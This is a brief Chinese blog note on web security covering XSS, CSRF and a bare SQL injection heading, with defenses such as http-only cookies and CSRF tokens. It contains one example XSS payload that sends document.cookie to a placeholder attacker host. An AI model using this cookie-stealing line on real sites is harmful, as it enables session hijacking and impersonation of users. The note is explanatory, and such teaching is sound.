Web安全問題

1.xss 跨站腳本攻擊(反射型,存儲型)

? ? 偽造會話(基于xss實(shí)現(xiàn)csrf)

? ?劫持cookie:

window.open("http://www.xxx.com/record?secret=" + document.cookie)

自動將他們的cookie信息發(fā)送到攻擊者的服務(wù)器,攻擊者可以在cookie有效期內(nèi)拿他們冒充用戶操作。

? ?惡意代碼執(zhí)行

防御:

輸入過濾。cookie設(shè)置http-only(這樣腳本無法獲取cookie)。

2.csrf 跨站請求偽造

? 偽造用戶身份操作

防御:

驗(yàn)證http referer字段(不嚴(yán)謹(jǐn),因?yàn)榭梢源鄹模?/p>

在請求地址中添加token驗(yàn)證(比如在post中,已參數(shù)形式加入隨機(jī)產(chǎn)生的token)

csrf的前提是cookie驗(yàn)證用戶身份

ajax無法帶cookie驗(yàn)證

ajax受瀏覽器的同源策略限制,ajax默認(rèn)無法請求跨域的接口(當(dāng)然后臺可以設(shè)置access-control-allow-origin:* 之類的允許跨域請求),ajax請求無法攜帶跨域cookie

3.sql注入

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

友情鏈接更多精彩內(nèi)容